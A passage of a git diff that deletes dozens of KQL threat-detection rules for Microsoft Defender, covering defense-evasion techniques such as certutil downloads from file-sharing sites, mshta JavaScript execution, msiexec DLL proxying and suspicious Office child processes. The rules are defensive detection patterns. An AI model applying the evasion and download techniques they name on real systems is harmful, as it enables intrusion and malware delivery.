-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: medium
-// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not(((FolderPath contains "\\{" and FolderPath contains "}\\") or FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql b/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql
deleted file mode 100644
index 36f6b599..00000000
--- a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/23
-// Level: medium
-// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Extexport_Execution.kql b/Defense Evasion/Suspicious_Extexport_Execution.kql
deleted file mode 100644
index 35568b7e..00000000
--- a/Defense Evasion/Suspicious_Extexport_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Extexport.exe loads dll and is execute from other folder the original path
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "Extexport.exe" or FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql
deleted file mode 100644
index dcfdf274..00000000
--- a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Extract data from cab file and hide it in an alternate data stream
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql b/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql
deleted file mode 100644
index d2f5c2de..00000000
--- a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/09
-// Level: high
-// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index f12091dd..00000000
--- a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
-// Tags: attack.persistence, attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
deleted file mode 100644
index 99d431f0..00000000
--- a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
-// Tags: attack.defense_evasion, attack.execution
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql
deleted file mode 100644
index 50e632ee..00000000
--- a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql
deleted file mode 100644
index e9033362..00000000
--- a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index 195823a7..00000000
--- a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql b/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql
deleted file mode 100644
index 9f95881c..00000000
--- a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
-// Tags: attack.t1036.005, attack.defense_evasion
-DeviceFileEvents
-| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_GUP_Usage.kql b/Defense Evasion/Suspicious_GUP_Usage.kql
deleted file mode 100644
index 4b5e7075..00000000
--- a/Defense Evasion/Suspicious_GUP_Usage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/02/06
-// Level: high
-// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql b/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql
deleted file mode 100644
index da1a04b7..00000000
--- a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/23
-// Level: high
-// Description: Get-Variable is a valid PowerShell cmdlet
-WindowsApps is by default in the path where PowerShell is executed.
-So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
-
-// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_HH.EXE_Execution.kql b/Defense Evasion/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Defense Evasion/Suspicious_HH.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql b/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql
deleted file mode 100644
index a625bfda..00000000
--- a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/09
-// Level: informational
-// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql b/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql
deleted file mode 100644
index 04a154d3..00000000
--- a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql b/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql
deleted file mode 100644
index 8b9e448e..00000000
--- a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects execution of javascript code using "mshta.exe".
-// Tags: attack.defense_evasion, attack.t1218.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql b/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql
deleted file mode 100644
index ab40eb86..00000000
--- a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/11/07
-// Level: medium
-// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
-
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceFileEvents
-| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql b/Defense Evasion/Suspicious_MSDT_Parent_Process.kql
deleted file mode 100644
index 294e0977..00000000
--- a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nextron Systems
-// Date: 2022/06/01
-// Level: high
-// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
-// Tags: attack.defense_evasion, attack.t1036, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql b/Defense Evasion/Suspicious_MSHTA_Child_Process.kql
deleted file mode 100644
index 0e72056c..00000000
--- a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag
-// Date: 2019/01/16
-// Level: high
-// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
-// Tags: attack.defense_evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql b/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql
deleted file mode 100644
index 255e5e51..00000000
--- a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
-// Date: 2018/04/06
-// Level: high
-// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
-// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql b/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql
deleted file mode 100644
index 271488d2..00000000
--- a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/11/17
-// Level: medium
-// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql b/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql
deleted file mode 100644
index 4facc676..00000000
--- a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
-// Tags: attack.t1218.007, attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql b/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql
deleted file mode 100644
index 367b993a..00000000
--- a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql b/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql
deleted file mode 100644
index e611a0b5..00000000
--- a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/28
-// Level: medium
-// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
